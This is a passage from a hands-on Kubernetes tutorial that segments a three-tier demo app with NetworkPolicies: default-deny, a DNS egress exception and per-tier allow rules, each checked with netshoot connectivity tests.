<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">db</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">postgres:15-alpine</span>
          <span class="hljs-attr">env:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">POSTGRES_PASSWORD</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">pass</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">5432</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pg</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<blockquote>
<p>After a minute or two, you should have:  </p>
<ul>
<li><code>web.frontend.svc.cluster.local</code> (HTTP 80)  </li>
<li><code>api.backend.svc.cluster.local</code> (HTTP 80)  </li>
<li><code>postgres.db.svc.cluster.local</code> (TCP 5432)</li>
</ul>
</blockquote>
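<p>Before moving on, it’s worth confirming everything actually came up. A quick loop over the three namespaces does it (pod names and cluster IPs will differ in your cluster):</p>
<pre><code class="lang-bash"># check that each tier's deployment and service exist and are ready
for ns in frontend backend db; do
  kubectl get pods,svc -n "$ns"
done
</code></pre>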
<h3 id="heading-test-pods-netshoot-for-quick-verification">Test pods (netshoot) for quick verification</h3>
<blockquote>
<p>netshoot is <a target="_blank" href="https://hub.docker.com/r/nicolaka/netshoot">a Docker networking troubleshooting Swiss-Army container</a>, which makes it perfect for this exercise.</p>
</blockquote>
<p>Let's see what the default behavior is. We want to make sure everything is connected, so we'll run a temporary shell in each namespace and test connectivity:</p>
<h4 id="heading-from-frontend-shell">From frontend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~#</span>
</code></pre>
<h4 id="heading-from-backend-shell">From backend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n backend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.110.205.214) 5432 port [tcp/postgresql] succeeded!
test:~#</span>
</code></pre>
<h4 id="heading-from-anywhere">From anywhere:</h4>
<pre><code class="lang-bash"><span class="hljs-built_in">test</span>:~<span class="hljs-comment"># dig +short google.com #google ip</span>
142.251.46.206
<span class="hljs-built_in">test</span>:~<span class="hljs-comment">#</span>
</code></pre>
<p>Cool. With <strong>no</strong> NetworkPolicies, these will all work. Of course, the goal is to not have <strong>everything</strong> work. Let's get that process going.</p>
<hr />
<h2 id="heading-default-deny-everything">Default-Deny Everything</h2>
<p>The first rule of any security posture: deny, deny, deny. Ok maybe those are three rules, but you get the point.</p>
<p>The first rule of network policy: flip the cluster from “allow all” to “deny by default.”  </p>
<p>We've established the Kubernetes default configuration allows every pod to talk to every other pod. To change that, we apply a very basic network policy with an empty <code>podSelector</code> (which matches <em>all</em> pods in the namespace) and no rules. That blocks all ingress and egress.</p>
<p>Here’s a default-deny you can drop into each namespace. Save it as a single file called <code>deny-policy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Ingress"</span>, <span class="hljs-string">"Egress"</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Ingress"</span>, <span class="hljs-string">"Egress"</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Ingress"</span>, <span class="hljs-string">"Egress"</span>]
</code></pre>
<h3 id="heading-walkthrough">Walkthrough</h3>
<ul>
<li>Apply file via <code>kubectl apply -f deny-policy.yaml</code> to create the relevant network policies.</li>
<li>Every pod in those namespaces is now isolated: no incoming or outgoing connections.  </li>
<li>DNS lookups will also break, since all egress is now blocked. </li>
</ul>
<h3 id="heading-quick-test">Quick Test</h3>
<p>Spin up a <code>netshoot</code> pod in the <code>frontend</code> namespace and try some basics:</p>
<pre><code class="lang-bash">kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash

<span class="hljs-comment"># Inside the pod:</span>
curl http://api.backend.svc.cluster.local:80  
dig google.com
</code></pre>
<p>Both of these should now fail. Sadly, we've gone from no segmentation to deny everything. Not exactly helpful. But from here, we’ll add back the <em>minimum</em> connections the app needs to function. </p>
<p>One thing we’re not doing here is deleting the default-deny policy. That remains our baseline. Every new rule we add (like our soon to come DNS carve-out) is layered <em>on top of</em> the default deny. Think of it as our safety blanket.</p>
<hr />
<h2 id="heading-allow-dns-egress">Allow DNS Egress</h2>
<p>Once we flipped everything to default-deny, our first casualty was <strong>DNS: lookups stopped working.</strong> That’s expected, since every pod in <code>frontend</code>, <code>backend</code>, and <code>db</code> is now cut off from making <em>any</em> outbound connection, including the boring-but-essential queries to the cluster DNS service. Even a simple <code>dig google.com</code> from your netshoot pods fails.</p>
<p><strong>Why DNS matters to the app:</strong>  </p>
<ul>
<li><strong>Service discovery.</strong> Pods usually talk to each other by service names (<code>api.backend.svc.cluster.local</code>), not IPs. Without DNS, those names don’t resolve and your “frontend → backend” call breaks.  </li>
<li><strong>External calls.</strong> If a pod talks to anything outside the cluster (API, S3, etc.), it resolves by name first. No DNS = instant failure.  </li>
<li><strong>Certs &amp; health checks.</strong> TLS handshakes and readiness probes often rely on hostnames. Break DNS and you’ll see flaky startups or cert errors.  </li>
</ul>
<p>So we explicitly allow egress <strong>only to the cluster DNS service</strong> (CoreDNS/kube-dns in <code>kube-system</code>) on <strong>UDP/TCP 53</strong>. This does <strong>not</strong> open general internet egress; it simply lets pods ask, “what IP is <code>api.backend.svc.cluster.local</code>?” and go back to being productive.</p>
<p>Here’s an allow-DNS policy you can drop into each namespace. Save it as a single file called <code>dns-networkpolicy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">kubernetes.io/metadata.name:</span> <span class="hljs-string">kube-system</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">kubernetes.io/metadata.name:</span> <span class="hljs-string">kube-system</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">kubernetes.io/metadata.name:</span> <span class="hljs-string">kube-system</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">53</span>
</code></pre>
<p>One caveat: I’m not 100% sure the <code>k8s-app=kube-dns</code> label holds on every distribution, so check your DNS pods’ labels with <code>kubectl get pods -n kube-system --show-labels</code> before relying on it. It works on my kubeadm cluster with Calico CNI.</p>
<h3 id="heading-walkthrough-1">Walkthrough</h3>
<ul>
<li>Apply file via <code>kubectl apply -f dns-networkpolicy.yaml</code> to create the relevant network policies.</li>
<li>This doesn’t allow full internet egress, just DNS queries to <code>kube-dns</code>.  </li>
<li>Now you can run <code>dig google.com</code> from your netshoot pods and get a valid response again.</li>
</ul>
<h3 id="heading-quick-test-1">Quick Test</h3>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# dig +short google.com
142.250.176.14
test:~#</span>
</code></pre>
<p>Cool, works as we want. With DNS restored, your apps can resolve service names and external domains, but all other connections are still blocked. Next we’ll add back the actual service-to-service flows that make the three-tier app work.</p>
<hr />
<h2 id="heading-allow-service-to-service-flows">Allow Service-to-Service Flows</h2>
<p>With DNS back in place, pods can at least resolve names again, but all other traffic is still blocked. That’s exactly what we want: a default-deny baseline plus a single DNS carve-out. Now it’s time to add back the flows that actually make our three-tier app work.</p>
<h3 id="heading-frontend-backend">Frontend → Backend</h3>
<p>Our frontend pods need to call the backend API on <strong>TCP 80</strong>. That means we have to allow two directions:  </p>
<ul>
<li><strong>Egress</strong> from the frontend pods to the <code>backend</code> namespace on port 80.  </li>
<li><strong>Ingress</strong> into the backend pods, but only from the <code>frontend</code> namespace and only on that port.  </li>
</ul>
<p>Here’s the frontend → backend allow pair: an egress policy in <code>frontend</code> and an ingress policy in <code>backend</code>. Save both in a single file called <code>front-to-back-networkpolicy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-egress-to-backend</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}  <span class="hljs-comment"># or matchLabels: {app: web} if you want to scope to just the web pods</span>
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-frontend-to-backend</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">from:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">frontend</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
</code></pre>
<h3 id="heading-backend-database">Backend → Database</h3>
<p>Next, backend pods need to talk to Postgres on <strong>TCP 5432</strong>. Just like with frontend → backend, that means two pieces:  </p>
<ul>
<li><strong>Egress</strong> from the backend pods to the <code>db</code> namespace on port 5432.  </li>
<li><strong>Ingress</strong> into the db pods, but only from the <code>backend</code> namespace and only on that port.  </li>
</ul>
<p>Here’s the backend → db allow pair: an egress policy in <code>backend</code> and an ingress policy in <code>db</code>. Save both in a single file called <code>back-to-db-networkpolicy.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Egress from backend → db</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-backend-egress-to-db</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span> {}
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">"Egress"</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">to:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">db</span>
          <span class="hljs-attr">podSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
<span class="hljs-meta">---</span>
<span class="hljs-comment"># Ingress into db from backend</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-backend-to-db</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">from:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">namespaceSelector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
      <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
</code></pre>
<h3 id="heading-walkthrough-2">Walkthrough</h3>
<ul>
<li>Apply these policies on top of the default-deny and DNS rules.  </li>
<li>Frontend → Backend on port 80 should now succeed.  </li>
<li>Backend → DB on port 5432 should now succeed.  </li>
<li>Any other cross-namespace attempt (like frontend → db or db → backend) still fails.  </li>
</ul>
<h3 id="heading-quick-test-2">Quick Test</h3>
<h4 id="heading-from-frontend-shell-1">From frontend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~#</span>
</code></pre>
<h4 id="heading-from-backend-shell-1">From backend shell:</h4>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run -n backend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.110.205.214) 5432 port [tcp/postgresql] succeeded!
test:~#</span>
</code></pre>
<p>At this point we’ve re-enabled just enough traffic for the app to function: frontend → backend → db, plus DNS everywhere. Everything else remains blocked. That’s <strong>baseline L3/L4 segmentation</strong> in action.</p>
<p>Now if you doubted me on the DNS thing, just delete that policy and try frontend to backend. Good luck.</p>
<hr />
<h2 id="heading-what-we-just-built">What We Just Built</h2>
<p>Now let's step back for a second. We started with a cluster that was flat and wide open: every pod could talk to every other pod, in every namespace, on every port. That’s the default state of Kubernetes networking, convenient but quite insecure.</p>
<p>Now look at where we are:</p>
<ul>
<li><strong>Default-deny baseline</strong>: nothing moves unless we say so.  </li>
<li><strong>DNS carve-out</strong>: pods can still resolve service names and external hosts, but nothing else is open-ended.  </li>
<li><strong>Frontend → Backend on :80</strong>: the app’s public entry point can reach the API tier, and that’s it.  </li>
<li><strong>Backend → DB on :5432</strong>: the API tier can query the database, but it’s walled off from everything else.  </li>
<li><strong>Everything else blocked</strong>: no random cross-namespace chatter, no sneaky egress to the internet.  </li>
</ul>
<p>What we’ve really built here is a <strong>3-hop app chain</strong>: frontend → backend → database, with DNS as the plumbing. Instead of a spaghetti mess of possible connections, the graph collapses down to just the flows the app is supposed to have. </p>
<p>This is <strong>least privilege at L3/L4</strong>. And it is dead simple, no service mesh required. Just a handful of manifests that take Kubernetes from “anyone can talk to anyone” to “only these three things can talk, on these two ports.” Not bad.</p>
<hr />
<h2 id="heading-lateral-movement-blocked">Lateral Movement, Blocked</h2>
<p>So we get a nice win. Without policies, landing in the frontend gives an attacker the run of the cluster: curl into the backend, hop into the database, and keep poking at other namespaces until something breaks. That's on us, not Kubernetes.</p>
<p>With our policies in place, the world just got a lot smaller:  </p>
<ul>
<li>In <strong>frontend</strong>, you can only send traffic to backend’s API service on port 80. No database, no random namespaces, no internet egress.  </li>
<li>In <strong>backend</strong>, you can only reach Postgres on port 5432. No shortcut to frontend, no talking to other services.  </li>
<li>The <strong>db</strong> tier is a walled garden. It only listens to backend, and that’s it.  </li>
</ul>
